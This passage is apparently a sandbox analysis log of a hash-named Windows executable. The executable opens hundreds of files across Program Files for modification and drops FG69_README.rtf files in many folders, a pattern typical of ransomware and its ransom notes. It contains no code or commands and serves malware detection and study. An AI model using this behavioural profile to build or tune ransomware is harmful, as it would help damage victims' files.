d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\EnableImport.svgz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\AssertOut.m1v d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\ImportOut.ogg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 